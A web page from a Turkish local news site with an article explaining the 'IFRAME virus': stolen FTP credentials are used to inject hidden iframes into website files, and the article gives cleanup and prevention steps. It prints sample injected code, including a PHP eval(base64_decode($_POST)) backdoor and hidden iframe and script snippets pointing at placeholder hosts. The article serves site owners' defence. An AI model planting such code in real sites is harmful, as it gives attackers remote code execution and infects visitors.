Erbaa Sözlüğünden

Çok dövmek, öldüresiye dövmek.

O Bir Erbaalı

Erbaa Nöbetçi Eczane

Bugün için nöbetçi eczane bilgisi girilmemiş.

Takvimi Göster

IFRAME Virüsü Nedir?

IFRAME Virüsü nedir?

Virüslü bilgisayarlardan FTP girişi yapılan sitelerin index, default ve/veya tüm dosyalara zararlı bir IFRAME kodu yerleştirir. Virüs, sitenize giren kullanıcıların bilgisayarlarına virüs bulaştırmayı amaçlamaktadır.

Zararlı IFRAME Virüsü sitelere genellikle FTP üzerinden bulaşmaktadır.

Nasıl bulaşır :

1. Saldırgan öncelikle güncel antivirus yazılımları ile korunmayan bilgisayarınıza bir virus bulaştırır.
2. Bilgisayarınıza Bulaştırılan virüsun amacı bilgisayarınızdaki FTP Programında şifrenin saklandığı dosyayı ve/veya ftp şifrenizi çalmaktır . FTP bilgileri çalındıktan sonra, saldırgan dilediği zaman ftp girişi yapıp, sitenizin index.*, default.* veya tüm dosyalarınızın html taglarının arasına (genellikle sayfanın sonuna) iftame veya script tagı yerleştirir.

IFRAME tagı sayfanızın html tagları arasında gizlenir. Sayfanızı ziyaret eden kullanıcılara virus bulaştırmayı amaçlamaktadır.

IFRAME Virüsü sitenizdeki php, asp veya asp.net kod açıklarından da bulaşabilir. Sitenizdeki dosya ve klasörlerin yazma izinlerinin açık olmasını kullanarak dosyalarınıza bulaşabilir.

IFRAME kod örnekleri:

PHP dosyalarında aşağıdaki türde gereksiz ve zararlı kodlarda bulabilirsiniz. Bunları temizlemeniz gerekecektir. Zararsız olarak görünürler ancak site hızını yavaşlatırlar.

if(@$_POST['test']){eval(base64_decode($_POST['test'])); exit();}php if(@$_POST['test']){eval(base64_decode($_POST['test'])); exit();}

Javascript Dosyalarında:
;document.write('e width="50" height="50" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://siteadi.com/dosyaadi.cgi?5"></iframe>');

HTML, ASP, PHP,..... dosyaları içerisinda aşağıdaki klasik iframe kodlarını görebilirsiniz.

<IFRAME src='http://siteadresi/index.php' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></IFRAME>

echo "<IFRAME src="http://siteadresi123" width=1 height=1 style="visibility:hidden;position:absolute"> </IFRAME>";

Korunmak için yapmanız gerekenler:

1. FTP şifrenizi değiştiriniz.
2. Bilgisayarınızda güncel bir antivirüs yazılımı kullanınız.
3. FTP şifrenizi otomatik girişe ayarlamayın veya FTP girişlerinden sonra şifrenizi değiştiriniz.
4. IFRAME Virüsü sitenizdeki php, asp veya asp.net kod açıklarından bulaşmış olabilir. Bundan korunmak için kontrol panelinizden dosyalarınızın yazma izinlerini kaldırınız, sadece gerekli dosya veya klasörlerinize yazma izni veriniz.

Sitelerinizi kontrol ediniz:

Sitenizdeki index.*, default.* dosyalarını bilgisayarınıza indirip html kodlarını gözden geçiriniz. Index.* ve/veya default.* dosyalarınız temiz ise virüs bulaşmamış demektir. Virüs öncelikle bu dosyalara bulaşır. Ancak yine de diğer doslarınızın güncellenme tarihlerini gözden geçiriniz.

Zararlı kod bulaşmış dosyalarınızı temizleyiniz.

IFRAME Virüsü bulaşan siteler Google arama motoru ve Firefox tarayıcısı tarafından saldırgan site olarak sınıflandırılır. Bu sitelere giriş izni verilmez.

Siteniz Google'da saldırgan site olarak listeleniyorsa:

IFRAME Virüsü bulunan site google arama sonuçlarında saldırgan site olarak gösterilir. Bunu düzeltmek için şunları yapabilirsiniz:

1. http://www.google.com/webmasters/tools/ adresine giriş yapınız.

2. Gmail hesabınız veya yeni bir hesap ile giriş yapınız.

3. Sitenizi ekleyerek doğrulayınız.

4. Sitenizi doğruladıktan sonra, kötü amaçlı yazılım uyarısına tıklayarak, zararlı kodların bulaştığı sayfaları görün ve sayfalarınızdan zararlı kodları temizleyin.

5. Sol menüden “Siteyi tekrar değerlendirme” seçeneğine tıklayın …

6. Sitenizde bulunan zararlı kodları kaldırdığınızı ve tekrar değerlendirmelerini rica ediniz.

7. Siteniz birkaç gün içinde saldırgan site olmaktan çıkarılacaktır !

Benzer İçerikler

Macar Öğrencinin Cevabı
Macar öğrenci Victoria Angel'in AB ile ilgili soru üzerine verdiği cevap alkış topladı. Erbaa Mithatpaşa İlköğretim Okulu'nun hazırlamış olduğu...
Başbakan Erdoğan'a Tokat Kutlaması
Başbakan Recep Tayyip Erdoğan’ın 60 yaşına girmesi dolayısı ile bir müteahhit 60 RTE 2023 plaka ile ilginç bir kutlamaya imza attı. Başbakan...
Niksar'da Dünya'nın 3 Darphanesinden Biri Bulunuyor
Niksar Belediye Başkanı Duran Yadigar, çeşitli kaynaklarda Niksar’ın dünyadaki 3 darphaneden birisinin merkezi olduğuna dair bilgiler olduğunu...
Gazi Osman Paşa Üniversitesi Kontenjanı: 7 Bin 800
GOÜ Rektörü Prof. Dr. Mustafa Şahin, 2013-2014 eğitim ve öğretim yılında kabul edecekleri öğrenci kontenjanın 7 bin 800’e yakın olduğunu söyledi....
Kaymakamlık İhale İlanı
Erbaa Kaymakamlığı Hükümet Konağı 150 KVA Diesel Elektrojen Gurubu yapım işi 4734 sayılı Kamu İhale Kanununun 19 uncu maddesine göre açık ihale usulü...
Eski Tekel Binasında Yangın
Eski tekel binalarında bu gün 16.30 sularında başlayan yangın az kalsın faciaya neden oluyordu. İtfaiyenin zamanında müdahalesi eski tekel...
İlçemiz Kaymakamı Keçeci İlköğretim Okulunu Ziyaret Etti
Erbaa Kaymakamı Sayın Erdal ÇAKIR, İlköğretim Okulları ziyaretleri kapsamında ilçe merkezine 30 km mesafede bulunan Keçeci Köyü İlköğretim Okul...
2011
2011 Erbaa Haberleri